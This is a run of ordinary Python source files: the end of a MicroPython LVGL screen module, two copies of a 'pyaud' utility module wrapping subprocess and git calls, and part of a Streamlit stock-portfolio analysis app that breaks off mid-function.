label.set_text(lv.SYMBOL.PLUS) label.center() group.add_obj(btn) panel.update_snap(lv.ANIM.ON) lv.scr_load(scr) def draw_calibname_screen(new_pos): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(65, 16) h.set_text("Elegir nombre") name_ta = lv.textarea(scr) name_ta.set_placeholder_text("Nuevo perfil") name_ta.set_one_line(True) name_ta.set_pos(20, 45) name_ta.set_width(200) kb = lv.keyboard(scr) kb.add_event_cb(lambda e: calib_name_cb(e, new_pos, kb), lv.EVENT.READY, None) kb.set_size(240, 320 // 2) kb.set_textarea(name_ta) group.add_obj(name_ta) group.add_obj(kb) lv.scr_load(scr) def draw_loading_screen(): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(95, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("C.D.P.") s = lv.spinner(scr, 1000, 60) s.set_size(100, 100) s.center() h = lv.label(scr) h.set_pos(85, 220) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Cargando...") lv.scr_load(scr)
""" pyaud.utils =========== Utility classes and functions. """ from __future__ import annotations import functools as _functools import hashlib as _hashlib import logging as _logging import os as _os import shutil as _shutil import sys as _sys from pathlib import Path as _Path from subprocess import PIPE as _PIPE from subprocess import CalledProcessError as _CalledProcessError from subprocess import Popen as _Popen from subprocess import check_output as _sp_out from typing import Any as _Any from typing import Iterable as _Iterable from typing import List as _List from typing import MutableSequence as _ABCMutableSequence from typing import Optional as _Optional from typing import Tuple as _Tuple from typing import Union as _Union import setuptools as _setuptools from object_colors import Color as _Color from . import config as _config from ._environ import TempEnvVar as _TempEnvVar from ._objects import MutableSequence as _MutableSequence from .exceptions import CommandNotFoundError as _CommandNotFoundError from .exceptions import NotARepositoryError as _NotARepositoryError from .exceptions import ( PythonPackageNotFoundError as _PythonPackageNotFoundError, ) colors = _Color() colors.populate_colors() class _STDOut(_MutableSequence): """Only except str in the stdout object.""" def insert(self, index: int, value: str) -> None: if not isinstance(value, str): raise TypeError( "stdout received as '{}': only str instances allowed".format( type(value).__name__ ) ) super().insert(index, value) class Subprocess: """Object oriented Subprocess. ``exe`` is a mandatory argument used to construct the subprocess executable. Default ``file``, ``capture``, and ``devnull`` values can be set when instantiating the object and overridden later when using ``call``. :param exe: Subprocess executable. :key loglevel: Loglevel for non-error logging. :param commands: List of positional arguments to set as attributes if not None. :key file: File path to write stream to if not None. :key capture: Collect output array. :key log: Pipe stdout to logging instead of console. :key devnull: Send output to /dev/null. :raise CommandNotFoundError: Raise if instantiated subprocess cannot exist. """ def __init__( self, exe: str, loglevel: str = "error", commands: _Optional[_Iterable[str]] = None, **kwargs: _Union[bool, str], ) -> None: if not _shutil.which(exe): raise _CommandNotFoundError(exe) self._exe = exe self._loglevel = loglevel if commands is not None: for command in commands: setattr( self, command.replace("-", "_"), _functools.partial(self.call, command), ) self._kwargs = kwargs self._stdout: _ABCMutableSequence[str] = _STDOut() self.args: _Tuple[str, ...] = () def __repr__(self) -> str: return f"<{self.__class__.__name__} ({self._exe})>" def _handle_stdout( self, pipeline: _Popen, **kwargs: _Union[bool, str] ) -> None: if pipeline.stdout is not None: for line in iter(pipeline.stdout.readline, b""): line = line.decode("utf-8", "ignore") file = kwargs.get("file", self._kwargs.get("file", None)) if file is not None: with open(file, "a+", encoding="utf-8") as fout: fout.write(line) elif kwargs.get("capture", self._kwargs.get("capture", False)): self._stdout.append(line.strip()) elif kwargs.get("devnull", self._kwargs.get("devnull", False)): with open(_os.devnull, "w", encoding="utf-8") as fout: fout.write(line) else: _sys.stdout.write(line) def _handle_stderr(self, pipeline: _Popen) -> None: for line in iter(pipeline.stderr.readline, b""): # type: ignore getattr(_logging.getLogger(self._exe), self._loglevel)( line.decode("utf-8", "ignore").strip() ) def _open_process(self, *args: str, **kwargs: _Union[bool, str]) -> int: # open process with ``subprocess.Popen`` # pipe stream depending on the keyword arguments provided # Log errors to file regardless # wait for process to finish and return it's exit-code pipeline = _Popen( # pylint: disable=consider-using-with [self._exe, *args], stdout=_PIPE, stderr=_PIPE ) self._handle_stdout(pipeline, **kwargs) self._handle_stderr(pipeline) return pipeline.wait() def call(self, *args: _Any, **kwargs: _Any) -> int: """Call command. Open process with ``subprocess.Popen``. Pipe stream depending on the keyword arguments provided to instance constructor or overridden through this method. If a file path is provided it will take precedence over the other options, then capture and then finally devnull. Log errors to file regardless. Wait for process to finish and return it's exit-code. :param args: Positional str arguments. :key file: File path to write stream to if not None. :key devnull: Send output to /dev/null. :key capture: Collect output array. :key suppress: Suppress errors and continue running. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. """ self.args = tuple( # pylint: disable=consider-using-generator [str(i) for i in args] ) _logging.getLogger(self._exe).debug("called with %s", self.args) returncode = self._open_process(*self.args, **kwargs) if returncode and not kwargs.get("suppress", False): _logging.getLogger(self._exe).error( "returned non-zero exit status %s", returncode ) raise _CalledProcessError( returncode, f"{self._exe} {" ".join(self.args)}" ) return returncode def stdout(self) -> _ABCMutableSequence[str]: """Consume accrued stdout by returning the lines of output. Assign new container to ``_stdout``. :return: List of captured stdout. """ captured, self._stdout = self._stdout, _STDOut() return captured class _Git(Subprocess): """Git commands as class attributes. @DynamicAttrs """ def __init__(self) -> None: self.commands = [ i.lstrip().split()[0] for i in _sp_out(["git", "help", "--all"]).decode().splitlines() if i.startswith(" ") ] super().__init__("git", commands=self.commands, loglevel="debug") def call(self, *args: _Any, **kwargs: _Any) -> int: """Call partial git command instantiated in superclass. :param args: Command's positional arguments. :key file: File path to write the stdout stream to. :key capture: Pipe stream to self. :key devnull: Suppress output. :key suppress: Suppress errors and continue running. :raises NotARepositoryError: If not run from within a repository. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. """ git_dir = _Path.cwd() / ".git" with _TempEnvVar( _os.environ, GIT_WORK_TREE=str(_Path.cwd()), GIT_DIR=str(git_dir) ): if "--bare" in args: del _os.environ["GIT_WORK_TREE"] try: return super().call(*args, **kwargs) except _CalledProcessError as err: if not git_dir.is_dir(): raise _NotARepositoryError from err raise err class HashCap: """Analyze hashes for before and after. :param file: The path of the file to hash. """ def __init__(self, file: _Path) -> None: self.file = file self.before: _Optional[str] = None self.after: _Optional[str] = None self.compare = False self.new = not self.file.is_file() def _hash_file(self) -> str: """Open the files and inspect it to get its hash. :return: Hash as a string. """ with open(self.file, "rb") as lines: _hash = _hashlib.blake2b(lines.read()) return _hash.hexdigest() def _compare(self) -> bool: """Compare two hashes in the ``snapshot`` list. :return: Boolean: True for both match, False if they don't. """ return self.before == self.after def __enter__(self) -> HashCap: if not self.new: self.before = self._hash_file() return self def __exit__(self, exc_type: _Any, exc_val: _Any, exc_tb: _Any) -> None: try: self.after = self._hash_file() except FileNotFoundError: pass self.compare = self._compare() def branch() -> _Optional[str]: """Return current Git branch if in Git repository. :return: Checked out branch or None if no parent commit or repo. """ git.symbolic_ref( # type: ignore "--short", "HEAD", suppress=True, capture=True ) stdout = git.stdout() if stdout: return stdout[-1] return None class _Files(_MutableSequence): # pylint: disable=too-many-ancestors """Index all Python files in project.""" def __init__(self) -> None: super().__init__() self._exclude: _List[str] = [] def add_exclusions(self, *exclusions: str) -> None: """Add iterable of str objects to exclude from indexing. :param exclusions: Iterable of str names to exclude from index. """ self._exclude.extend(exclusions) def populate(self) -> None: """Populate object with index of versioned Python files.""" git.ls_files(capture=True) # type: ignore self.extend( list( # prevents duplicates which might occur during a merge set( _Path.cwd() / p for p in [_Path(p) for p in git.stdout()] # exclude any basename, stem, or part of a # `pathlib.Path` path if not any(i in self._exclude for i in (*p.parts, p.stem)) # only include Python files in index and p.name.endswith(".py") ) ) ) def reduce(self) -> _List[_Path]: """Get all relevant python files starting from project root. :return: List of project's Python file index, reduced to their root, relative to $PROJECT_DIR. Contains no duplicate items so $PROJECT_DIR/dir/file1.py and $PROJECT_DIR/dir/file2.py become $PROJECT_DIR/dir but PROJECT_DIR/file1.py and $PROJECT_DIR/file2.py remain as they are. """ project_dir = _Path.cwd() return list( set( project_dir / p.relative_to(project_dir).parts[0] for p in self ) ) def args(self, reduce: bool = False) -> _Tuple[str, ...]: """Return tuple suitable to be run with starred expression. :param reduce: :func:`~pyaud.utils._Tree.reduce` :return: Tuple of `Path` objects or str repr. """ paths = list(self) if reduce: paths = self.reduce() return tuple( # pylint: disable=consider-using-generator [str(p) for p in paths] ) def get_packages() -> _List[str]: """Return list of Python package names currently in project. Prevent dot separated subdirectories (import syntax) as args are evaluated by path. Only return the parent package's name. :raises PythonPackageNotFoundError: Raised if no package can be found. :return: List of Python packages. """ packages = list( set( i.split(".", maxsplit=1)[0] for i in _setuptools.find_packages( # in response to an update to `setuptools` stubs: # - error: Argument "where" has incompatible type # "Path"; expected "str" where=str(_Path.cwd()), exclude=_config.toml["packages"]["exclude"], ) ) ) if not packages: raise _PythonPackageNotFoundError("no packages found") packages.sort() return packages def package() -> str: """Return name of primary Python package. :raises PythonPackageNotFoundError: Raised if no primary package can be determined. :return: Name of primary Python package. """ # at least one package will be returned or an error would have been # raised packages = get_packages() # if there is only one package then that is the default if len(packages) == 1: return packages.pop() # if there are multiple packages found then look for a configured # package name that matches one of the project's packages package_name = _config.toml["packages"].get("name") if package_name in packages: return package_name # if there are multiple packages found, and none of the above two # apply, then the package with the same name as the project root (if # it exists) is the default repo = _Path.cwd().name if repo in packages: return repo # if none of the above criteria is met then raise raise _PythonPackageNotFoundError("cannot determine primary package") files = _Files() git = _Git()
""" pyaud.utils =========== Utility classes and functions. """ from __future__ import annotations import functools as _functools import hashlib as _hashlib import logging as _logging import os as _os import shutil as _shutil import sys as _sys from pathlib import Path as _Path from subprocess import PIPE as _PIPE from subprocess import CalledProcessError as _CalledProcessError from subprocess import Popen as _Popen from subprocess import check_output as _sp_out from typing import Any as _Any from typing import Iterable as _Iterable from typing import List as _List from typing import MutableSequence as _ABCMutableSequence from typing import Optional as _Optional from typing import Tuple as _Tuple from typing import Union as _Union import setuptools as _setuptools from object_colors import Color as _Color from . import config as _config from ._environ import TempEnvVar as _TempEnvVar from ._objects import MutableSequence as _MutableSequence from .exceptions import CommandNotFoundError as _CommandNotFoundError from .exceptions import NotARepositoryError as _NotARepositoryError from .exceptions import ( PythonPackageNotFoundError as _PythonPackageNotFoundError, ) colors = _Color() colors.populate_colors() class _STDOut(_MutableSequence): """Only except str in the stdout object.""" def insert(self, index: int, value: str) -> None: if not isinstance(value, str): raise TypeError( "stdout received as '{}': only str instances allowed".format( type(value).__name__ ) ) super().insert(index, value) class Subprocess: """Object oriented Subprocess. ``exe`` is a mandatory argument used to construct the subprocess executable. Default ``file``, ``capture``, and ``devnull`` values can be set when instantiating the object and overridden later when using ``call``. :param exe: Subprocess executable. :key loglevel: Loglevel for non-error logging. :param commands: List of positional arguments to set as attributes if not None. :key file: File path to write stream to if not None. :key capture: Collect output array. :key log: Pipe stdout to logging instead of console. :key devnull: Send output to /dev/null. :raise CommandNotFoundError: Raise if instantiated subprocess cannot exist. """ def __init__( self, exe: str, loglevel: str = "error", commands: _Optional[_Iterable[str]] = None, **kwargs: _Union[bool, str], ) -> None: if not _shutil.which(exe): raise _CommandNotFoundError(exe) self._exe = exe self._loglevel = loglevel if commands is not None: for command in commands: setattr( self, command.replace("-", "_"), _functools.partial(self.call, command), ) self._kwargs = kwargs self._stdout: _ABCMutableSequence[str] = _STDOut() self.args: _Tuple[str, ...] = () def __repr__(self) -> str: return f"<{self.__class__.__name__} ({self._exe})>" def _handle_stdout( self, pipeline: _Popen, **kwargs: _Union[bool, str] ) -> None: if pipeline.stdout is not None: for line in iter(pipeline.stdout.readline, b""): line = line.decode("utf-8", "ignore") file = kwargs.get("file", self._kwargs.get("file", None)) if file is not None: with open(file, "a+", encoding="utf-8") as fout: fout.write(line) elif kwargs.get("capture", self._kwargs.get("capture", False)): self._stdout.append(line.strip()) elif kwargs.get("devnull", self._kwargs.get("devnull", False)): with open(_os.devnull, "w", encoding="utf-8") as fout: fout.write(line) else: _sys.stdout.write(line) def _handle_stderr(self, pipeline: _Popen) -> None: for line in iter(pipeline.stderr.readline, b""): # type: ignore getattr(_logging.getLogger(self._exe), self._loglevel)( line.decode("utf-8", "ignore").strip() ) def _open_process(self, *args: str, **kwargs: _Union[bool, str]) -> int: # open process with ``subprocess.Popen`` # pipe stream depending on the keyword arguments provided # Log errors to file regardless # wait for process to finish and return it's exit-code pipeline = _Popen( # pylint: disable=consider-using-with [self._exe, *args], stdout=_PIPE, stderr=_PIPE ) self._handle_stdout(pipeline, **kwargs) self._handle_stderr(pipeline) return pipeline.wait() def call(self, *args: _Any, **kwargs: _Any) -> int: """Call command. Open process with ``subprocess.Popen``. Pipe stream depending on the keyword arguments provided to instance constructor or overridden through this method. If a file path is provided it will take precedence over the other options, then capture and then finally devnull. Log errors to file regardless. Wait for process to finish and return it's exit-code. :param args: Positional str arguments. :key file: File path to write stream to if not None. :key devnull: Send output to /dev/null. :key capture: Collect output array. :key suppress: Suppress errors and continue running. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. """ self.args = tuple( # pylint: disable=consider-using-generator [str(i) for i in args] ) _logging.getLogger(self._exe).debug("called with %s", self.args) returncode = self._open_process(*self.args, **kwargs) if returncode and not kwargs.get("suppress", False): _logging.getLogger(self._exe).error( "returned non-zero exit status %s", returncode ) raise _CalledProcessError( returncode, f"{self._exe} {' '.join(self.args)}" ) return returncode def stdout(self) -> _ABCMutableSequence[str]: """Consume accrued stdout by returning the lines of output. Assign new container to ``_stdout``. :return: List of captured stdout. """ captured, self._stdout = self._stdout, _STDOut() return captured class _Git(Subprocess): """Git commands as class attributes. @DynamicAttrs """ def __init__(self) -> None: self.commands = [ i.lstrip().split()[0] for i in _sp_out(["git", "help", "--all"]).decode().splitlines() if i.startswith(" ") ] super().__init__("git", commands=self.commands, loglevel="debug") def call(self, *args: _Any, **kwargs: _Any) -> int: """Call partial git command instantiated in superclass. :param args: Command's positional arguments. :key file: File path to write the stdout stream to. :key capture: Pipe stream to self. :key devnull: Suppress output. :key suppress: Suppress errors and continue running. :raises NotARepositoryError: If not run from within a repository. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. """ git_dir = _Path.cwd() / ".git" with _TempEnvVar( _os.environ, GIT_WORK_TREE=str(_Path.cwd()), GIT_DIR=str(git_dir) ): if "--bare" in args: del _os.environ["GIT_WORK_TREE"] try: return super().call(*args, **kwargs) except _CalledProcessError as err: if not git_dir.is_dir(): raise _NotARepositoryError from err raise err class HashCap: """Analyze hashes for before and after. :param file: The path of the file to hash. """ def __init__(self, file: _Path) -> None: self.file = file self.before: _Optional[str] = None self.after: _Optional[str] = None self.compare = False self.new = not self.file.is_file() def _hash_file(self) -> str: """Open the files and inspect it to get its hash. :return: Hash as a string. """ with open(self.file, "rb") as lines: _hash = _hashlib.blake2b(lines.read()) return _hash.hexdigest() def _compare(self) -> bool: """Compare two hashes in the ``snapshot`` list. :return: Boolean: True for both match, False if they don't. """ return self.before == self.after def __enter__(self) -> HashCap: if not self.new: self.before = self._hash_file() return self def __exit__(self, exc_type: _Any, exc_val: _Any, exc_tb: _Any) -> None: try: self.after = self._hash_file() except FileNotFoundError: pass self.compare = self._compare() def branch() -> _Optional[str]: """Return current Git branch if in Git repository. :return: Checked out branch or None if no parent commit or repo. """ git.symbolic_ref( # type: ignore "--short", "HEAD", suppress=True, capture=True ) stdout = git.stdout() if stdout: return stdout[-1] return None class _Files(_MutableSequence): # pylint: disable=too-many-ancestors """Index all Python files in project.""" def __init__(self) -> None: super().__init__() self._exclude: _List[str] = [] def add_exclusions(self, *exclusions: str) -> None: """Add iterable of str objects to exclude from indexing. :param exclusions: Iterable of str names to exclude from index. """ self._exclude.extend(exclusions) def populate(self) -> None: """Populate object with index of versioned Python files.""" git.ls_files(capture=True) # type: ignore self.extend( list( # prevents duplicates which might occur during a merge set( _Path.cwd() / p for p in [_Path(p) for p in git.stdout()] # exclude any basename, stem, or part of a # `pathlib.Path` path if not any(i in self._exclude for i in (*p.parts, p.stem)) # only include Python files in index and p.name.endswith(".py") ) ) ) def reduce(self) -> _List[_Path]: """Get all relevant python files starting from project root. :return: List of project's Python file index, reduced to their root, relative to $PROJECT_DIR. Contains no duplicate items so $PROJECT_DIR/dir/file1.py and $PROJECT_DIR/dir/file2.py become $PROJECT_DIR/dir but PROJECT_DIR/file1.py and $PROJECT_DIR/file2.py remain as they are. """ project_dir = _Path.cwd() return list( set( project_dir / p.relative_to(project_dir).parts[0] for p in self ) ) def args(self, reduce: bool = False) -> _Tuple[str, ...]: """Return tuple suitable to be run with starred expression. :param reduce: :func:`~pyaud.utils._Tree.reduce` :return: Tuple of `Path` objects or str repr. """ paths = list(self) if reduce: paths = self.reduce() return tuple( # pylint: disable=consider-using-generator [str(p) for p in paths] ) def get_packages() -> _List[str]: """Return list of Python package names currently in project. Prevent dot separated subdirectories (import syntax) as args are evaluated by path. Only return the parent package's name. :raises PythonPackageNotFoundError: Raised if no package can be found. :return: List of Python packages. """ packages = list( set( i.split(".", maxsplit=1)[0] for i in _setuptools.find_packages( # in response to an update to `setuptools` stubs: # - error: Argument "where" has incompatible type # "Path"; expected "str" where=str(_Path.cwd()), exclude=_config.toml["packages"]["exclude"], ) ) ) if not packages: raise _PythonPackageNotFoundError("no packages found") packages.sort() return packages def package() -> str: """Return name of primary Python package. :raises PythonPackageNotFoundError: Raised if no primary package can be determined. :return: Name of primary Python package. """ # at least one package will be returned or an error would have been # raised packages = get_packages() # if there is only one package then that is the default if len(packages) == 1: return packages.pop() # if there are multiple packages found then look for a configured # package name that matches one of the project's packages package_name = _config.toml["packages"].get("name") if package_name in packages: return package_name # if there are multiple packages found, and none of the above two # apply, then the package with the same name as the project root (if # it exists) is the default repo = _Path.cwd().name if repo in packages: return repo # if none of the above criteria is met then raise raise _PythonPackageNotFoundError("cannot determine primary package") files = _Files() git = _Git()
#Libraries import base64 import datetime from io import BytesIO, StringIO import os import pandas as pd import streamlit as st import plotly import yfinance as yf from technical_analysis import download_data, portfolio_return, benchmark_return, wealth_plot,accumulated_return_plot, drawdawn_plot, allocation_plot, day_returns_plot from fundamental_analysis import market_cap, annual_financials, quarter_income_statement, calculate_ratios, market_cap_plot, bar_plot, line_plot #Downloader def export_plotly_image_link(fig,path_file): mybuff = StringIO() fig.write_html(mybuff, include_plotlyjs='cdn') mybuff = BytesIO(mybuff.getvalue().encode()) b64 = base64.b64encode(mybuff.read()).decode() #plotly.offline.plot(fig, filename=path_file, auto_open=False) href = f'<a href="data:text/html;charset=utf-8;base64, {b64}" download="{os.path.basename(path_file)}">Download plot</a>' return href def export_plotly_image_button(fig,path_file): plotly.offline.plot(fig, filename = path_file, auto_open=True) def save_all(path_file): with open(path_file, 'a') as f: f.write(fig_wealth_plot.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_accumulated_return.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_drawdawn.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_day_returns.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_allocation.to_html(full_html=False, include_plotlyjs='cdn')) ######################STREAMLIT APP############## st.set_page_config(layout="wide",initial_sidebar_state='expanded',page_title="Stock Portfolio Tracker") st.write('<style>div.row-widget.stRadio > div{flex-direction:row;}</style>', unsafe_allow_html=True) st.write("# PORTFOLIO ANALYSIS ") ##################PROXY OPTION############### st.markdown("### Behind proxy server") proxy_option = st.radio(label='Proxy server', options=['No','Yes']) ##########TECHNICAL OR FUNDAMENTAL########### analysis_type = st.sidebar.radio("Choose an info type",('Technical', 'Fundamental')) ###PORTFOLIO COMPOSITION### st.markdown("### Select the stocks that will make up your portfolio") sp500 = pd.read_csv("./dat/all_tickers.csv")[['Symbol']] symbols = sp500['Symbol'].sort_values().tolist() big_fish = ['AAPL','AMZN','GOOGL','MSFT'] portfolio_companies = st.multiselect(label="Selected stocks", options = list(symbols), default=big_fish) ###BENCHMARK OPTIONALITY AND PORTFOLIO ALLOCATION### if analysis_type== 'Technical': ###DATE RANGE### today = datetime.date.today() min_value = today - datetime.timedelta(days=20000) before = today - datetime.timedelta(days=2555) start_date = st.sidebar.date_input('Start date', before, min_value=min_value) end_date = st.sidebar.date_input('End date', today, min_value=min_value) if start_date > end_date: st.sidebar.error('Error: End date must fall after start date.') ###INITIAL INVESTMENT### st.markdown("### Select your initial investment ($)") initial_investment = st.slider(label='Initial investment ($)', key='Initial investment', value=10_000, min_value=1_000, max_value=100_000, step=1_000) ###BENCHMARK OPTIONALITY### st.markdown("### Benchmark index") benchmark_option = st.radio(label='Benchmark', options=['None','S&P 500', 'Nasdaq Composite', 'Both']) ###PORTFOLIO ALLOCATION### st.sidebar.markdown("Do you want an equally balanced porfolio?") allocation = st.sidebar.selectbox('Select', ['Yes','No']) if len(portfolio_companies)>=1: if allocation=='Yes': company_weighs = [1 / len(portfolio_companies)] * len(portfolio_companies) else: st.sidebar.markdown("Select the percentage allocated to each company (%)") company_weigh_balanced = 1/len(portfolio_companies) company_weighs = [] for company in portfolio_companies: company_weigh = st.sidebar.number_input(company, value = company_weigh_balanced, min_value=0.0, max_value=1.0, step=0.01) company_weighs.append(company_weigh) else: pass ###APP## proxy_server = os.getenv('PROXY_SERVER') if st.button("Analyze portfolio",key='1'): if len(portfolio_companies)==0: st.warning("Introduce at least a company ticker") else: ########################################################FUNDAMENTAL################################### if analysis_type == "Fundamental": with st.spinner(text='In progress: it may take a few seconds.'): #####################################################DATA########################################################### ##### TICKERS ###### dict_tickers = {} for ticker in portfolio_companies: dict_tickers[ticker] = yf.Ticker(ticker) ######### MARKET CAPITALIZATION ############ df_market_cap = market_cap(dict_tickers, proxy_option) market_cap_columns = df_market_cap.loc[:, df_market_cap.columns.str.contains('Market_cap')].columns df_market_cap = df_market_cap[market_cap_columns] ######## QUARTER INCOME STATEMENT ############ df_quarter_income_statement,df_annual_income_statement_forecasted = quarter_income_statement(dict_tickers) ######### ANNUAL FINANCIALS ################ df_annual_financials = annual_financials(dict_tickers) df_annual_financials = pd.concat([df_annual_income_statement_forecasted,df_annual_financials]).reset_index(drop=['index']) df_annual_financials = pd.concat([df_annual_financials,df_market_cap],axis=1) df_annual_financials = df_annual_financials.fillna(method='bfill') ####### RATIOS ########################### df_complete_annual = calculate_ratios(df_annual_financials,dict_tickers) #st.write(df_complete_annual) #######################################################PLOTS############################################################# ##################MARKET CAP METRICS################ st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> MARKET CAP METRICS </h1>", unsafe_allow_html=True) fig_market_cap, dict_stock_color = market_cap_plot(df_complete_annual, period='Annually', substring="Market_cap", y_title="Market cap ($)", general_title="Market cap (B$) over time") st.plotly_chart(fig_market_cap) #################REVENUE METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> REVENUE METRICS </h1>", unsafe_allow_html=True) #REVENUE PLOT# fig_revenue_plot_annual = bar_plot(df_complete_annual, dict_stock_color=dict_stock_color,period = 'Annually', substring="Revenue",y_title="Revenue (B$)",general_title="Revenue (B$) over time") st.plotly_chart(fig_revenue_plot_annual) # REVENUE NORMALIZED PLOT# fig_normalized_revenue_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_revenue", y_title="Normalized revenue", general_title = "Normalized revenue since beginning of period") st.plotly_chart(fig_normalized_revenue_plot_annual) # P/S PLOT# fig_price_to_sales = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="P/S", y_title = "P/S multiple", general_title = "P/S since beginning of period") st.plotly_chart(fig_price_to_sales) #REVENUE GROWTH PLOT# #fig_growth_revenue_plot_annual = bar_plot(df_complete_annual, dict_stock_color = dict_stock_color, period='Annually', # substring="Growth_revenue", y_title="Revenue growth", general_title = "Revenue growth year-over-year") #st.plotly_chart(fig_growth_revenue_plot_annual) # REVENUE PLOT (QUARTER)# fig_revenue_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color, period='Quarterly', substring="Revenue", y_title="Revenue (B$)", general_title="Revenue (B$) over time") st.plotly_chart(fig_revenue_plot_quarter) ################GROSS PROFIT METRICS################# st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> GROSS PROFIT METRICS </h1>", unsafe_allow_html=True) # GROSS PROFIT PLOT# fig_gross_profit_plot_annual = bar_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Gross_profit", y_title="Gross profit ($)", general_title="Gross profit year-over-year") st.plotly_chart(fig_gross_profit_plot_annual) # GROSS PROFIT NORMALIZED PLOT# fig_normalized_gross_profit_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_gross_profit", y_title="Normalized gross profit", general_title="Normalized gross profit since beginning of period") st.plotly_chart(fig_normalized_gross_profit_plot_annual) # P/GROSS_PROFIT PLOT# fig_price_to_gross_profit = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="P/G", y_title="P/Gross profit multiple", general_title="P/Gross profit since beginning of period") st.plotly_chart(fig_price_to_gross_profit) # GROSS PROFIT GROWTH PLOT# #fig_growth_gross_profit_plot_annual = bar_plot(df_complete_annual, period='Annually', dict_stock_color=dict_stock_color, # substring="Growth_gross_profit", y_title="Gross profit growth", general_title="Gross profit growth year-over-year") #st.plotly_chart(fig_growth_gross_profit_plot_annual) # GROSS PROFIT PLOT (QUARTER)# fig_gross_profit_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color, period='Quarterly', substring="Gross_profit", y_title="Gross profit ($)", general_title="Gross profit quarter-over-quarter") st.plotly_chart(fig_gross_profit_plot_quarter) ##############NET INCOME METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> NET INCOME METRICS </h1>", unsafe_allow_html=True) #NET INCOME PLOT# fig_income_plot_annual = bar_plot(df_complete_annual, dict_stock_color = dict_stock_color, period='Annually', substring="Net_income",y_title="Net income ($)",general_title="Net income year-over-year") st.plotly_chart(fig_income_plot_annual) # NET INCOME NORMALIZED PLOT# fig_normalized_net_income_plot_annual = line_plot(df_complete_annual,dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_net_income", y_title="Normalized net income",general_title = "Normalized net income since beginning of period") st.plotly_chart(fig_normalized_net_income_plot_annual) #P/E PLOT# fig_price_to_earnings = line_plot(df_complete_annual, dict_stock_color=dict_stock_color,period='Annually', substring="P/E", y_title = "P/E multiple", general_title="P/E since beginning of period") st.plotly_chart(fig_price_to_earnings) # NET INCOME GROWTH PLOT# #fig_growth_income_plot_annual = bar_plot(df_complete_annual, period='Annually', dict_stock_color=dict_stock_color, # substring="Growth_net_income", y_title="Net income growth", general_title="Net income growth year-over-year") #st.plotly_chart(fig_growth_income_plot_annual) # NET INCOME PLOT (QUARTER)# fig_income_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color,period='Quarterly', substring="Net_income",y_title="Net income ($)",general_title="Net income quarter-over-quarter") st.plotly_chart(fig_income_plot_quarter) ############RESEARCH & DEVELOPMENT METRICS##### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> RESEARCH & DEVELOPMENT METRICS </h1>", unsafe_allow_html=True) #RESEARCH & DEVELOPMENT# fig_research_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="R&D/revenue", y_title="R&D/Revenue ratio", general_title="R&D/Revenue ratio year-over-year") st.plotly_chart(fig_research_plot_annual) ##############DEBT METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> DEBT METRICS </h1>", unsafe_allow_html=True) # CURRENT RATIO PLOT# fig_current_ratio = line_plot(df_complete_annual, period="Annually",dict_stock_color=dict_stock_color, substring="Current_ratio",y_title="Current ratio", general_title="Current ratio year-over-year") st.plotly_chart(fig_current_ratio) # DEBT-TO-EQUITY PLOT# fig_debt_to_equity = line_plot(df_complete_annual, period="Annually", dict_stock_color=dict_stock_color, substring="Debt/equity",y_title="Debt/Equity ratio", general_title="Debt/Equity ratio year-over-year") st.plotly_chart(fig_debt_to_equity) # DEBT-TO-EBIT PLOT# fig_debt_to_ebit = line_plot(df_complete_annual, period="Annually", dict_stock_color=dict_stock_color, substring="Debt/ebit", y_title="Debt/Ebit ratio", general_title="Debt/Ebit ratio year-over-year") st.plotly_chart(fig_debt_to_ebit) #stock = yf.Ticker("AYX") #if proxy_option == 'Yes': # stock.get_info(proxy = proxy_server) #else: # stock.get_info() #st.write(stock.major_holders) #st.write(stock.institutional_holders) #st.write(stock.recommendations) else: #1) Percentage allocation check if (sum(company_weighs)<= 0.99) | (sum(company_weighs) >= 1.01): st.warning("The sum of the percentages must be equal to 1") else: with st.spinner(text='In progress: it may take a few seconds.'): dict_of_df, min_dates, error_tickers = download_data(portfolio_companies, start_date, end_date, proxy_option) min_common_date = max(min_dates) #2) Date check delta_period = datetime.timedelta(5) late_symbols = [symbol for symbol in list(dict_of_df.keys()) if dict_of_df[symbol]['Date'].min()>start_date+delta_period] if start_date < min_common_date - delta_period: if len(late_symbols)==1: st.warning(f"The earliest common date for the portfolio is on the: {min_common_date.strftime("%d/%B/%Y")}. {late_symbols} was listed after the selected start date ({start_date}).") else: st.warning(f"The earliest common date for the portfolio is on the: {min_common_date.strftime("%d/%B/%Y")}. {late_symbols} were listed after the selected start date ({start_date}).") company_list_df = list(dict_of_df.values()) #3) Ticker check if len(error_tickers)!=0: #If one symbol is delisted or not found, nothing is shown. st.warning(f"{error_tickers} No data found, symbol may be delisted") else: day_returns = portfolio_return(company_list_df, portfolio_companies, initial_investment, company_weighs, start_date, end_date ) if benchmark_option == 'None': benchmark_returns = day_returns[['Date']] else: if benchmark_option == 'S&P 500': 